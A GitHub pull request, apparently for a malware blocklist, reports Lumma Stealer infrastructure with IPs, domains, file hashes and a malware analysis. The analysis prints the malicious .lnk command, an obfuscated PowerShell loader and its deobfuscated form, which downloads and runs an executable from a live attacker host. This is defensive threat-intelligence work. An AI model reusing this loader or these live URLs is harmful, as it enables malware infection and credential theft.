Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add 87.120.115.240 - lumma stealer - malware #726

Merged
merged 5 commits into from
Jan 27, 2025

Conversation

g0d33p3rsec
Copy link
Contributor

@g0d33p3rsec g0d33p3rsec commented Jan 27, 2025

Phishing Domain/URL/IP(s):

80.76.51.231
87.120.115.240
3xp3cts1aim.sbs
befall-sm0ker.sbs
librari-night.sbs
owner-vacat10n.sbs
p10tgrace.sbs
p3ar11fter.sbs
peepburry828.sbs
processhol.sbs
smiteattacekr.org
tripeggyun.fun
http://87.120.115.240/Downloads/tg.-frumos-hcl-nr.-75-1.pdf.lnk
https://80.76.51.231/Samarik
https://80.76.51.231/Kompass-4.1.2.exe

Impersonated domain


Describe the issue

Filename sha256
tg.-frumos-hcl-nr.-75-1.pdf.lnk bb2e14bb962873722f1fd132ff66c4afd2f7dc9b6891c746d697443c0007426a
Samarik 40b80287ba2af16daaf8e74a9465a0b876ab39f68c7ba6405cfcb41601eeec15
Kompass-4.1.2.exe e15c6ecb32402f981c06f3d8c48f7e3a5a36d0810aa8c2fb8da0be053b95a8e2

tg.-frumos-hcl-nr.-75-1.pdf.lnk -> Wmic -> powershell iex -> Mshta -> https://80.76.51.231/Samarik | powershell -> https://80.76.51.231/Kompass-4.1.2.exe

I found a malicious .lnk file that contains the following:

"C:\Windows\System32\Wbem\wmic.exe" process call create "powershell iex '\*i*\S*3*\m*ta.e* https://80.76.51.231/Samarik' | powershell -"

The second stage is a powershell script containing:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddgfunction kCw ($lAxkDVr){return -split ($lAxkDVr -replace '..', '0x$& ')};$XvdhLtU = kCw($ddg.SubString(0, 1376));$apj = [System.Security.Cryptography.Aes]::Create();$apj.Key = kCw($ddg.SubString(1376));$apj.IV =  New-Object byte[] 16;$liRjFT = $apj.CreateDecryptor();$Brpsr = [System.String]::new($liRjFT.TransformFinalBlock($XvdhLtU, 0,$XvdhLtU.Length)); sal fd $Brpsr.Substring(3,3); fd $Brpsr.Substring(6)

The first 1376 characters of $ddg are the encrypted data and the remaining characters are the AES encryption key. $apj.IV = New-Object byte[] 16; sets the IV to 16 bytes of zeros. After decryption we are left with:

jfriEXfunction kCw($dZS, $kgu){sc $dZS $kgu -Encoding Byte};function Wzi($dZS){start $dZS };function lsp($pUY){$cGU = New-Object (iPP @(105,128,143,73,114,128,125,94,135,132,128,137,143));$kgu = $cGU.DownloadData($pUY);return $kgu};function iPP($Mnq){$MNL=27;$qyC=$Null;foreach($KtF in $Mnq){$qyC+=[char]($KtF-$MNL)};return $qyC};function hmL(){$qQe = $env:AppData + '\';;;$xjmNYNtvCOoH = $qQe + 'Kompass-4.1.2.exe'; if (Test-Path $xjmNYNtvCOoH){Wzi $xjmNYNtvCOoH;}Else{$ZselmcOkvJZW = lsp (iPP @(131,143,143,139,142,85,74,74,83,75,73,82,81,73,80,76,73,77,78,76,74,102,138,136,139,124,142,142,72,79,73,76,73,77,73,128,147,128));kCw $xjmNYNtvCOoH $ZselmcOkvJZW;Wzi $xjmNYNtvCOoH};;;}hmL;

We can further deobfuscate the second stage to:

function kCw($filePath, $content) {
    Set-Content $filePath $content -Encoding Byte
}

function Wzi($filePath) {
    Start-Process $filePath
}

function lsp($url) {
    $client = New-Object Net.WebClient
    return $client.DownloadData($url)
}

function iPP($values) {
    $shift = 27
    $output = ""
    foreach ($char in $values) {
        $output += [char]($char - $shift)
    }
    return $output
}

function hmL() {
    $AppDataPath = $env:AppData + '\Kompass-4.1.2.exe'

    if (Test-Path $AppDataPath) {
        Wzi $AppDataPath
    } else {
        $url = "https://80.76.51.231/Kompass-4.1.2.exe"
        $data = lsp $url
        kCw $AppDataPath $data
        Wzi $AppDataPath
    }
}

hmL;

The second stage downloads https://80.76.51.231/Kompass-4.1.2.exe and saves the file in AppData. Kompass-4.1.2.exe is detected by multiple engines as a variant of lumma stealer. We can enumerate a list of C2 domains through dynamic analysis.

Related external source

https://urlscan.io/result/ed1f38e2-1ba5-4149-b291-2002a19ec221/
https://app.any.run/tasks/dfa9206b-71f9-43ee-8b7f-94765e95bb19
https://www.virustotal.com/gui/domain/tripeggyun.fun/relations
https://www.virustotal.com/gui/domain/processhol.sbs/relations
https://www.virustotal.com/gui/domain/librari-night.sbs/relations
https://www.virustotal.com/gui/domain/befall-sm0ker.sbs/relations
https://www.virustotal.com/gui/domain/p10tgrace.sbs/relations
https://www.virustotal.com/gui/domain/peepburry828.sbs/relations
https://www.virustotal.com/gui/domain/owner-vacat10n.sbs/relations
https://www.virustotal.com/gui/domain/3xp3cts1aim.sbs/relations
https://www.virustotal.com/gui/domain/p3ar11fter.sbs/relations
https://www.virustotal.com/gui/file/bb2e14bb962873722f1fd132ff66c4afd2f7dc9b6891c746d697443c0007426a/details
https://www.virustotal.com/gui/url/6cf2009de72b333ff30e3ca4166e51db2c844c180d9df7302ea6aaa1ea63d2f7/details
https://www.virustotal.com/gui/url/1598c1362dde4fb5800bab7005148f50342e1f308a04bddb79c58ad5cb59e591/details
https://urlscan.io/search/#page.domain%3A87.120.115.240
https://urlscan.io/search/#page.domain%3A80.76.51.231

Screenshot

Click to expand

image
image
image
image
image
image
image

@g0d33p3rsec
Copy link
Contributor Author

g0d33p3rsec commented Jan 28, 2025

In the any run traffic, a connection to steamcommunity.com can be seen.
image
The VirusTotal relations show the URI as https://steamcommunity.com/profiles/76561199724331900.
image
image
If we rotate dxtepleelnpvc.zcr by 15 characters, we get smiteattacekr.org.
image

@g0d33p3rsec
Copy link
Contributor Author

Screenshot 2025-01-28 151039
Screenshot 2025-01-28 151210
Screenshot 2025-01-28 151237
Screenshot 2025-01-28 151327
Screenshot 2025-01-28 151748
Screenshot 2025-01-28 151417
Screenshot 2025-01-28 151527
Screenshot 2025-01-28 151824

spirillen added a commit to mypdns/matrix that referenced this pull request Feb 3, 2025
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

1 participant